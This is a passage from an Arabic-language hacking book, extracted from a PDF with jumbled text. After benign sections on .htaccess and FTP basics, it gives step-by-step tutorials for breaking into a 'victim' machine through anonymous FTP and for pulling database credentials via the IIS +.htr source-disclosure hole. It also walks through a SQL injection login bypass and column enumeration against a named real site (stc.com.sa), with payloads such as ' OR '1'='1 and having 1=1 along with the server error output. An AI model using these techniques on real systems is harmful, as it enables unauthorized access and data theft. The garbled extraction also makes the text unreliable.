----------------------- |400 | Bad Syntax|

----------------------- |401 | Unauthorized |

----------------------- |402 | Not Used|

----------------------- |403 | Forbidden|

----------------------- |404 | Not Found|

-----------------------

index* منع عرض محتويات المجلد الذي ل يوجد به -----------------------------------------------

يقوم الموقع بسرد جميع محتوياتindexبعض المواقع عند محاولة فتح اي دليل عليها و ل يكون به ملف هذا الدليل

و لحل هذه المشكله توجد طريقتين :- في كل المجلدات " و بالطبع هذا صعب جدا "indexأ- وضع ملف

عن طريق اضافه السطر التالي في الملف :-htaccessب- باستخدام الملف . Options -Indexes

* منع/اتاحة دخول الموقع لشخاص معينة-------------------------------------

منع شخص معين من دخول الموقع بعد معرفة الي بي الخاصه به وhtaccessيمكنك باستخدام الملف .يمكنك التسفاده

من ذلك حيث يمكنك منع دخل الموقع لمن ل تريد كما يمكنك منع دخول الموقع لي شخص في اسرائيلمثل ..

و يمكنك ذلك عن طريق اضافة السطر التالي في الملف : - ???.???.???.??? deny from

حيث ان ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هو الي بي الخاص به .واذا اردت منع اي احد من دخول الموقع يمكنك اضافة السطر التالي :- deny from all

واذا اردت السماح لشخص معين بدخول الموقع يمكنك ذلك باضافة السطر التالي :- allow from ؟؟؟.؟؟؟.؟؟؟.؟؟؟

212

Page 213: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

حيث انا ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هو الي بي الخاص به

* تحويل من يحاول فتح لينك للينك اخر -------------------------------------

الملف تستخدم مثل عند تغيرhtaccess وهي من اهم فوائد .Redirectionوتسمى هذه العمليه ب موقع ملف قديم

عند محاولة احد فتح احد الينك القديمhtaccessعلى الموقع الى مكان جديد فيمكنك باستخدام الملف .توجيه

الى الينك الجديد عن طريق اضافة السطر التالي في الملف :-/???.??? Redirect /somewhere/???.???

http://www.site.com/newlocation /???.??? هو مكان الملف القديم وsomewhereبحيث يكون /

http://www.site.com/newlocationهو مكان ???.???/الملف الجديد.

----------

.htpasswd* عمل الملف ------------------------

, و سوف نعمله تى نسطيع استخدام الملف .htaccessويمكنك تقوم بعمله بنفس طريقة الملف .htaccess

ما يأتي :- htpasswdفي الحماية و سوف نكتب في الملف user1:EncryptedPwd1

user2:EncryptedPwd2o حيث ان user1 , user2. هو اسم المستخدم o و EncryptedPwd1 , EncryptedPwd2هي كلمات السر ولكن مشفره و يمكنك تشفير اي

كلمة تريدها عن طريق الموقع

http://www.euronet.nl/~arnow/htpasswdاو

http://www.e2.u-net.com/htaccess/make.htm

نذهب اول الىfu93hds3 و كلمة السر الخاصة به هي Securityفمثل لو اردنا وضع يوسر باسم الموقع

http://www.euronet.nl/~arnow/htpasswd o و username : Security o و passwrod & re-enter password : fu93hds3 o و نضغط على الزر claculate <-- لتظهر النتيجه Security:893bNicBcwszw

و الذي قمنا بعمله و ذلك لكي نستطيع استخدام الملف .htaccessو الن قد اتممنا عمل الملف .htaccess

للحماية بكلمة سر و يوسر .htaccess* الحماية بواسطه .

----------------------------و تعتبر الفائدة الرئيسية للملف حيث انه يمكن منع اي احد من دخول دليل معين في الموقع ال اذا كان معه

كلمة السر و اليوسر نيم , فيمنكنك عن طريقها عمل منتدى خاص او اي شئ تريد. في اي دليل و حاول احد دخول هذا الدليل او اي جزء يندرج تحته سوفhtaccessفعند وضع الملف .

يطلب منه كلمة سر و يوسر .

213

Page 214: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

و يمكنك عمل ذلك عن طريق اضافة ما يأتي في الملف قبل نسخه في الدليل المراد حمايته :--

AuthUserFile /somewhere/.htpasswd" AuthName "Enter your user and passed

please Require valid-user

AuthType Basic

> Limit GET POST< require valid-user

/> Limit<o بحيث يكون somewhere/.htpasswd. هو مكان ملف /htpasswd على موقعك o و يكون Enter your user and passed pleaseهي الرساله التي سوف تظهر لتطلب كلمة

السر

htaccess* منع اظهار الملف .-----------------------------

قد عرفنا الن ان لهذا الملف اهميه كبيره فيجب علينا ان نحميه جيدا , فالبرغم من ان الملف مخفي الانه غير سالم من ان يكون السرفر نفسه غير مؤمن او انه هناك تصريح خطأ ..

لذلك سوف نمنع عرض هذا الملف عن طريق اضافة ما يأتي : -

> Files .htaccess< order allow,deny

deny from all/> Files<

.error 403فاذا حاول احد عرض الملف سوف يظهر له

* جعل الصفحات تظهر بامتداد اخر -------------------------------

مثل .txt و لكنه ذو امتداد .htmlويمكن باستخدام هذه الخاصية عمل ملف يظهر كأن امتداده .باضاف السطر التالي :-

AddType text/plain htmlويمكنك رؤية كافى التغيرات التي يمكنك عملها في هذا الملف :-

http://www.pharaonics.net/books/MIME.txt

انتهى،،،

"FTP" نظام نقل الملفات

214

Page 215: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةةة ةةةةة><ةةةةةة: ةةةةةة>

؟ FTPما هو نقل الملفات

FTP هي اختصار لكلمة File Transfer Protocolوتعني بروتوكول نقل الملفات، وهذه الخدمة هي التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزاتTCP/IPاحدى تسهيلت

FTPالرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقومFormatsتشغيل مختلفة وعليه فلديها أشكال

, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفا في أميركا الى جهازنا . FTPبه

أقسام نقل الملفات:

نقل الملفات ينقسم الى قسمين:

:Downloadتنزيل الملفات

.Local الى الجهاز المحلي Hostوهو جلب الملفات من الكمبيوتر المضيف

:Uplaodارسال الملفات

.Host الى الكمبيوتر المضيف Localوهو ارسال الملفات من الكمبيوتر المحلي

ومن الناحية المنية فهناك نوعان لنقل الملفات:

:Secure FTPنقل مؤمن

تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.

:Anonymous FTPنقل مجهول

عوضاanonymous أو guestلتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالبا استخدام عنهما.

تصنف مصادر البرامج على النترنت الى ثلثة أقسام:

:Public Domainملكية عامة

وضعت البرامج هنا للستخدام العام فليس هناك حقوق ملكية لحد ول قيود على استخدامها وتوزيعهاوتعديلها.

:Freewareمصادر مجانية

يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ول يجوز تعديلها أو بيعها.

:Sharewareمصادر مشتركة

يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جميع المميزات ويجب تحطيم النسخ بعد

215

Page 216: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهاء مدتها.

FTP : و الفيروسات

يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين

ASCII:

) والملفات منAmerican Standard Code for Information Interchangeاختصارا لـ( . ويستخدم هذا المصطلح127 تتراوح قيمتها بين الصفر و bitsهذا النوع تحتوي على سبعة جزيئات

للتعبير عن المعيار الذي يقوم بتحويل الحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوعمن الصيغ.

Binary:

وتندرج255 تتراوح بين الصفر و bitsوتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات الصور والبرامج والملفات المضغوطة تحت هذا النوع.

& jpg & gif كما ليمكن أن تنتقل عبر الصور كصيغ ASCIIوالفيروسات ل يمكن أن تنتقل عبر ملفات bmp وغيرها من امتدادات الصور ول عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wavوغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة

- exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxeماتكون: b64 - bhx كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات ،MS Officeلذلك احذر من هذه ،

الملفات وافحصها دائما قبل تشغيلها.

: FTPطريقة نقل الملفات

هناك طرق عديدة لنقل الملفات وهي:

UNIXنقل الملفات باستخدام نظام

:UNIXتتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر

ascii لنقل ملفات :ASCIIالنصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة المر.

binaryلنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة : المر.

status لفحص الملف ومعرفة هل هو من نوع :ASCII أو Binary.

help لعرض قائمة بأوامر :UNIX.

216

Page 217: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

dir عرض محتويات الدليل :

ls.عرض محتويات الدليل الحالي :

cd directory.تغيير الدليل :

get filename.جلب الملف المطلوب وانزاله على جهازك :

mget filename.جلب مجموعة من الملفات:

pwd.طباعة الدليل الحالي :

bye.انهاء الرتباط والخروج من النظام البعيد :

:Shellنقل الملفات باستخدام حساب

أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثل سوف تدخل ftp متبوعا بالوجهة المرادة فيصبح: ftp، نكتب أول المر Unix Shell عن طريق Tripodحسابك في

ftp.tripod.com" ثم ندخل السم وهو عل سبيل المثال IronPrivateثم نقوم بادخال الرقم السري ،" المعتادة.Unixوهو مثل "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر

Unixوإذا أردت المزيد من المعلومات عن نظام الـ

عليك الدخوول الى هذا الموقع :

http://www.pc-worlds.net/lunexx.html

فهو يفيد المبتدئين فى هذا النظام .

:Browserنقل الملفات باستخدام المتصفح

ويبدأ العنوانURLنقل الملفات عن طريق المتصفحات سهل جدا فما عليك سوى ادخال عنوان الموقع ستأتيFTP للعناوين العادية، بعد الدخول الى موقع الـhttp ثم العنوان بدل من كلمة //:ftpبكلمة //:

الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لنزاله.

:SLIP/PPPنقل الملفات باستخدام حساب

. وأفضلClient Programsأفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة .Ws_ftp هو برنامج Windowsبرنامج تابع يمكن استخدامه للنوافذ

: Ws_ftp LE 5.06 استخدام برنامج

Sessionادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Profile والذي من خلله تقوم بتسجيل الدخول، اكتب في خانة Profile Nameاسم حساب الدخول؛

اسم الملقن وفي هذاHost Name واكتب في خانة My Home Page In Tripodعلى سبيل المثال لكي يقوم بالتدقيقAuto Detect اختر Host Type ثم في خانة ftp.tripod.comالمثال هو

وهو مثلUser IDالتلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة السم في خانة IronPrivate ثم الرقم السري في خانة Passwordوسيظهر مخفيا على هيئة نجوم ******, ثم اضغط

OK:كما في الشكل التالي .

217

Page 218: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم اليسر هو جهاز الكمبيوتر لديك والقسم اليمن هو جهاز الكمبيوتر المضيف، في هذه المرحلة تستطيع جلب أو

ارسال الملفات أو تغيير اسمائها أو حذفها ... الخ. أي تستطيع التحكم في محتويات حسابك على النترنت أوعلى جهازك بسهولة فائقة.

: Telnetنقل الملفات باستخدام التصال الشبكي البعيد

Telnetهي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعل جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف.

فل مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعضWindowsاذا كان الجهاز البعيد يستخدم نظام الوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالوامر اللزمة.

: Windows من Telnet- استخدام برنامج

ثمStart يمكنك الدخول عليه بالضغط على قائمة ابدأ Telnet برنامجا سهل يسمى Windowsترفق Remote اختر Connect وستنفتح لك صفحة البدء للبرنامج.. من Telnet ثم اكتب Runتشغيل

System في صندوق الحوار .Connect الذي سيظهر لك اكتب في خانة Host Nameاسم ملقن الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـPortالجهاز المضيف ثم اكتب في خانة

Term Type ان كان لديك وال قم بالتجربة. بعد ذلك اضغط ، Connectوعندما يتم الربط فستحتاج وبعد ذلكConnect من قائمة Disconnectلدخال السم والرقم السري. وبعد النتهاء من النقل اختر

.Exitاختر انتهى،،،

"FTP" الختراق عن طريق

218

Page 219: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةةة ةةةةة ةةةةة> >hacker dz<ةةةةةة:

اليوم سوف نتناول طريقة إقتحام عبر فتيبيFTP

أول و لنجاح القتحام يجب ان يكون لدى الضحية البور21

مفتوح و هو البور الخاص بFTP

و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمهاSuperscanne

بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هيإضغط على

Startثم

Runثم اكتب

ftp –nسوف تطلع لك نافدة في الدوس مكتوب عليها

FTP<ؤوكي لحد هنا كل شيء تمام

و بعدين اكتبOpen

ثم إضغط على إدخال

Enterسوف تتحصل عب النتيجة التالية

FTP<To

أكتب بجانب To

رقم البي للضحية ثم إضغط على إدخالو الن خد بالك معي

إدا تحصلت على هدا الرد فقد تخطيت خطوةConnected to www.assassin.com

220 websrv1 Microsoft FTP Service (Version 4.0.(و الن أكتب الكتابة التالية

ftp>quote user ftpإدا تحصلت على هدا الرد فقد تخطيت خطوة

331 Anonymous acces allowed, send identify (e-mail name) as password.

و الن أكتب الكتابة التاليةftp>quote cwd ~root

إدا تحصلت على هدا الرد فقد تخطيت خطوة530 Please login with USER and PASS

ثم أكتب الكتابة التاليةftp>quote pass ftp

219

Page 220: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

إدا تحصلت على هدا الرد فقد تخطيت خطوةو نجحت في القتحام

230 Anonymous user logged in.مبروك أنت الن في جهاز الضحية

ما عليك الن ال ان تقوم بإستعمال اوامر الفتيبي

و طبعا لن امر عليها مرور الكرام لكي ل تقعو في المشكلة الي وقعت فيها و هي نجاح القتحام من دون ما دقيقة و انا مجمد اليدي و20أعرف و ل فكرة على اوامر الفتيبي و إدا اردتم ان تضحكو بقاليأكثر من

الضحية عالقة من دون أن أعمل أي شيء و لهداقمت بحضير الىوامر لكي تطبقوها مباشرةا بعد نجاح القتحام

Pwdلكي تعر ما يحتويه الهارد ديسك

Cd لقتحام مجلد مثال

Cd blackفي هدا المثال قمت بإقتحام مجلد المسمى بلك

Lsلكي يتضح لك محتوى المجلد أو الهارد ديسك

Get لكي تحمل الى سطح المكتب بتاع جهازك

مثالGet black.exe

Putالعملية العكسية ل

Getيعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في

في جهاز الضحيةمثال

Put black.exeClos

لقطع التصال مع الضحية

هدي أهم الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيقالوام و شرحها و ارقامها

Codes: Signification:110 Restart marker reply.120 Service ready in nnn minutes. (nnn est un temps(125 Data connection already open; transfer starting.150 File status okay; about to open data connection.200 Command okay.202 Command not implemented, superfluous at this site.211 System status, or system help reply.212 Directory status.

220

Page 221: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

213 File status.214 Help message.215 NAME system type.220 Service ready for new user.221 Service closing control connection.225 Data connection open; no transfer in progress .226 Closing data connection.227 Entering passive mode (h1, h2, h3, h4, p1, p2.(230 User logged in, proceed.250 Requested file action okay, completed.257 " PATHNAME" created.331 User name okay, need password.332 Need account for login.350 Requested file action pendingfurther information.421 Service not available, closing control connection.425 Can't open data connection.426 Connection closed; transfer aborded.450 Requested file action not taken. (Fichier déjà utilisé par autre

chose(451 Requested action aborded: local error processing.452 Requested action not taken. (Pas assez de mémoire pour

exécuter l'action(500 Syntax error, command unrecognized.501 Syntax error in parameters or arguments.502 Command not implemented.503 Bad sequence of commands.504 Command not implemented for that parameter.530 Not logged in.532 Need account for storing files.550 Requested action not taken. (Fichier non trouvé, pas d'accès

possible(...,551 Requested action aborded: page type unknown.552 Requested file action aborded.553 Requested action not taken. (Nom de fichier non attribué(

انتهى،،،

"SQL" اختراق الـ

221

Page 222: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةةة ةةةةة> >linuxray<ةةةةةة:

)؟؟ SQLس :في البداية ماهي الس كيو ال (

الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية بASPهي صفحات تسحب بياناتها

وهذاSQL ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ASP وصفحات SQLمن قاعدة SQLماسوف اشير اليه لحقا ، و

1433تتنصت على البورت قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي علىSQLايضا مااريد ان اخبرك به ان ال

عدد من الجداول يمكن والعدد الكبير من البيانات التى تحتويها .SQLان تتصور كبرقواعد بيانات

؟SQLس : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات في الغالبASP بل منتديات PHPهذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات

سوف تحصل على جميع اسماء المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ، اما اذا كان

الموقع يحتوي على ميزة قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ، عندها قم بانشاء شركة للدعاية والعلن

_LinuxRayوسوف تصبح ثريا اذن لتنسى توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميلد ،

.Administratorممكن ان تصبح

اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ...

؟SQLس : مالذي تحتاجة للدخول على قواعد بيانات

Passwd و User Nameتحتاج فقط لل

س : من اين احصل على اسم المستخدم وكلمة المرور ؟

ASP منها كما اسلف صفحات ال User name and Passwdهناك طرق عديدة للحصول على هناك ثغرات كثير يمكنsqlوملفات اخرى من نوع *.

htrان تحصل منها على كلمات المرور مثل ثغرة +.كيف تستخدم هذه الثغرة :

http://target/page.asp+.htr targetالموقع الهدف : Page صفحة : asp

.+htrالثغرة :

هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدةاذن منها الفائدة هو

التىASP لكي ترى اوامر البرمجة الخاصة ب View Sourceخلف هذه الصفحة البيضاء اذهب الى ليمكن لك ان تراها في الوضع العادي : مثل

222

Page 223: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

%>

Set DB= Server.CreateObject("ADODB.Connection("DB.Open "DRIVER=SQL

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"

<%-----------------------------------------------------------------

LinuxRayفي الكود السابق ترى ان اسم المستخدم هو _6666666وكلمة السر هي

-----------------------------------------------------------------

مثل التي :ASPالشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال

AMicrosoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/filename.inc, line 5

هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسمincهناك ملف ينتهي بامتداد *.المستخدم وكلمة المرور

اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .

ASPوممكن ان ترى مثل هذا المر في صفحة database.incعند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف

#--!>include file = "database.inc<--"

وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات

global.asa++global.asa

beforemilion-global.asa-global.asa

milion.sqlglobal-direct.asa

SQLليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين

وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي :

global.asa+.htr

223

Page 224: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

كما يليdata هذا الرمز ::$ASP وهي ان تضيف بعد صفحة IIS 3هناك ثغرة قديمة في file.asp::$data

فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر .IIS 3هذه الثغرة لتعمل ال على

لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟

!!SQLبعدها الدخول على قاعدة ال

لكني مازلت افضلVisual interdev 6.0هناك عدة برامج تدخل على قاعدة البينات انا استخدم ACCESS 2000استخدام البرنامج السهل

كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمةFileاختر

Newومن قائمة الملفات الجديدة اختار

Project (Exiting Data(اي مشروع قاعدة بيانات موجودة .سيظهر لك مربع لنشاء الملف اختر

Createاي انشاء

الن سترى مربعData Link Properties

تحتاج فقط لثلث معلومات اسم الموقع او الي بي - اسم المستخدم - كلمة المرور

Select or enter server name - ادخل اسم الموقع في صندوق 1

User Name - اسم المستخدم في 2

Password - كلمة السر 3

)Blank Passwordملحظة ( قم بإزالة الصح من مربع

في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذهTest Connectionاضغط في البداية على Test Connection Succeededالعبارة

فمعناه ان التصال بقاعدة البيانات تم بنجاح.يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :

Select the data base on the server او موافق .OKواضغط على

انتهى،،،

"SQL" درس مفصل عن الـ

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة>

224

Page 225: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

>hish_hish<ةةةةةة:

أتجهت غالبية المواقع لستخدام صفحات ديناميكيه ومنها ما نحن موجودين فيه :)وتستخدم قواعد بيانات فيها كم كبير من المعلومات ,

ASP أو PHPوعن طريق سكربت مكتوب بإحدى لغات الويب الديناميكيه والتي تعمل جمبا إلى جمب مع محركات قواعد البيانات .

SQL Server , MySQL,Oracleيتم أستخلص المعلومات المطلوبه وترك البقيه

حيث تأخذ معلومات من المستخدم ومن ثم تعالج ويستخدم بعضها في تكون ليتم أستخلص البيانات أو التأكد من صحة بعض المدخلت لبناءSQLأوامر الـ

الصفحة المطلوبه أو قبول المستخدم أو رفضهدائما يتم طلب أسم مستخدم وكلمة مرور في الصفحات التي تخولك بعمل عمل ل

يقوم به إل من قام صاحب الموقع بإعطائه الصلحيه للقيام بهاكأن يقوم بحذف موضوعي :) أو تثبيته في القائمه :))))

حيث يتم التأكد من وجود أسم المستخدم في قاعدة البيانات وأن كلمة المرور المعطاه مطابقه لتلك الموجودهبجانب أسم المستخدم

الذي يقوم بالتأكد من وجودها وصلحيتهاSQLحيث يتم أخذ معلومه وتضمينها في أمر الـ ولكن يجب الحذر عند كتابة سكربت يقوم بتوثيق المستخدم للتأكد من أنه مخول له بالدخول للصفحه المحميه

أم ل SQLوذلك بالتأكد من نظافة القيم المستقبله من المستخدم وخلوها من أي رموز من شأنها أن تجعل أمر الـ

خاطئ في بنائه أو القيام بأي أمر غير مسموح به

SQL injectionسنتكلم الن عن ما يسمى حيث أنه ضعف في كتابة سكربت التوثيق وأيضا بوجود موقع للتجربه

وهو موقع شركة التصالت السعوديه /http://www.stc.com.saعنوان الموقع

عند الدخول للصفحة الرئيسيه نجد رابط يختص بمقدمي خدمة أنترنت في السعوديهhttp://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25وهو

عند دخوله فأنه يطلب منك أسم مستخدم وكلمة مرور !!!!SQL injectionدائما في الحاله هذه أول ما يتبادر لنا هو الـ

نقوم بتجربة أسم مستخدم : 'وكلمة مرور : '

فنحصل على الخطأ التالي

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14 '

]Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string .' ''

/arabic/Scripts/ar_csd_reply.asp, line 33

وفي بعض الحالت يظهر الخطا التالي

225

Page 226: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

]Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark

before the character string ''' AND Password.''=/admin/admin.asp, line 13

وأيضا أسم أحد العمده في الجدولSQLوفي الخطأ هذا حصلنا على جزء من أمر الـ

المستخدمه للتحقق صلحية أسم المستخدم وكلمةSQL Query للـ injectوهو ما يؤكد أمكانية عمل المرور المدخله . بشيء من التفصيلSQL injectionإذن لنتكلم عن الـ

لو كان لدينا سكربت يقوم بالتأكد من صلحية اسم المستخدم وكلمة المرور المدخله من المستخدم قأنناسنتحقق منها بالطريقة التاليه

code:

SELECT * from Users WHERE User_Name='<field from web form>' AND Password='<field from web form'<

if( TRUE}( Login OK

{ else}

Login FAILD{

عند قيام أحد المسموح لهم بالدخول للصفحة المحميه فأنه يقوم بكل تأكيد بتوثيق نفسه قبل أن يسمح لهبالدخول

فعند قيامه بأدخال أسم المستخدم وكلمة المرور الخاصه به adminأسم المستخدم : t0ps3cr3tكلمة المرور :

سيصبح بالشكل التالي :SQLفإن شكل امر الـ code:

SELECT * from Users WHERE Users_Name='admin' AND Password='t0ps3cr3t'

وكلمة المرورadmin تحقق فيه الشرط وهو أن يكون اسم المستخدم Userوعند وجود سطر في جدول t0ps3cr3t

أي أن المستخدم مخول بالدخول .TRUEفأن المر سيقوم بإرجاع قيمة وسيتم رفض الدخولFALSEغير ذلك سيتم إرجاع

.SQLملحظه : يجب أن يكون لديك ولو القليل من المعرفه بأوامر الـ >field from web formيحل محلها ما أدخله المستخدم في صفحة التحقق من صلحيته <

أصبح بالشكلSQLفي تجربتنا عندما قمنا بإدخال ' كإسم مستخدم وبالمثل لكلمة المرور فأن أمر الـ التالي :

code:

226

Page 227: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

SELECT * from Users WHERE User_Name=' ' ' AND Password'= ' '

ونلحظ أننا قمنا بإغلق علمة التنصيص الولى وبقي علمة تنصيص لم تغلق بعد وهو ما أدى لظهور رسالة الخطأ !!

blah' OR '1'='1الن نقوم بتجربة ام مستخدم : ومثلها لكلمة المرور.SQLفيصبح شكل أمر الـ

code:

SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'

لنحلل المر كل جزء على حداSELECT * from Users

Usersتعني أختر جميع السطور من الجدول WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'

في هذا الجزء نقوم بتحديد السطر الذي سنقوم بإختياره وهو الذي تتحقق فيه الشروط'blah' OR '1'='1'

لم تصبح قيمة نصيه ولكن أصبحت شرطORهنا بوجود يصبح الشرط صحيح إذا كان طرف واحد على القل من الطراف المشتركه في الشرط صحيح

'blahوفي حالتنا فإن الطرف الول هو 'TRUEوهو بدون الخوض في تفاصيل لسنا في صددها الن يعبر عن قيمة صحيحه

'1'='1والطرف الخر هو ' أم ل !!!!1 مساويه لـ 1يمكنك الجابة عن إذا كانت

TRUE OR TRUEإذا سيكون شكل الشرط بعد تحليله هو TRUEوبالتالي فإن النتيجه النهائيه للشرط هي

ونفس التفاصيل تحدث لكلمة المرور التي نكتبها علىTRUE التي نحصلها من الشرط ليست مساويه للكلمه TRUEملحظه مهمه جدا: القيمه لوحة المفاتيح الخاصه بنا

SQL injection لتمام الـ TRUE وكلمة مرور TRUEلذلك ل تحاول إستخدام أسم مستخدم

ويرجع محتوياته في مصفوفه Usersالشرط السابق سيقوم بأختيار أول سطر من الجدول وبالتالي في بعض الحالت ستجد أنك قد أستطعت الدخول للصفحة المحميه

ولكن في حالت أخرى للنكمل التفاصيل .....

يتحقق من عدة أشياء WHERE وهو ما يأتي بعد SQLيجب التنبه لنه ربما يكون الشرط في أمر الـ ) ليتم إهمال بقية السطر , حيث يمكننا الستعاضه عن ما أدخلناه قبل قليلtwo dashesلذلك نستخدم -- (بالمدخلت التاليه'--blah' OR '1'='1أسم مستخدم :

وكذلك كلمة المرور ( في بعض الحالت يمكنك إهمال كتابة كلمة مرور لن -- ستهملها لنها تأتي بعد اسمSQLالمستخدم في أمر الـ

توجد طريقه مريحه جدا ومضمونه بحيث أنك لن تحتاج لتخمين أحد أسماء العمدهhaving clauseوهي أستخدام بالطريقه التاليه'having 1=1أسم مستخدم --

حيث سنحصل على رسالة خطأ كالتاليهMicrosoft OLE DB Provider for ODBC Drivers error '80040e14 '

227

Page 228: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

]Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not

contained in an aggregate function and there is no GROUP BY clause .

/Arabic/Scripts/ar_csd_reply.asp, line 33 وبها أسم الجدول وأيضا أسم أول عمود

بعدها لنستطيع الحصول على اسماء بقية العمدهgroup byسنستخدم

بالشكل التالي--group by cs_isp_user.UserID'

passwdبعدها سنحصل على عمود أسمه فنستخدمه للحصول على اسم العمود اللي يليه بالشكل التالي

--group by cs_isp_user.UserID,cs_isp_user.passwd'ونكرر زيادة أسم كل جدول مع العمود إلى أن نحصل على صفحة تخبرنا بأن أسم المستخدم خاطئ !

نحتاج الن أن نقوم بجمع أكبر قدر ممكن من أسماء العمده في هذا الجدولنقوم بإدخال التالي :

)--blah' group by (usernameأسم مستخدم : فنحصل على الخطأ التالي :

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14 '

]Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'username .'

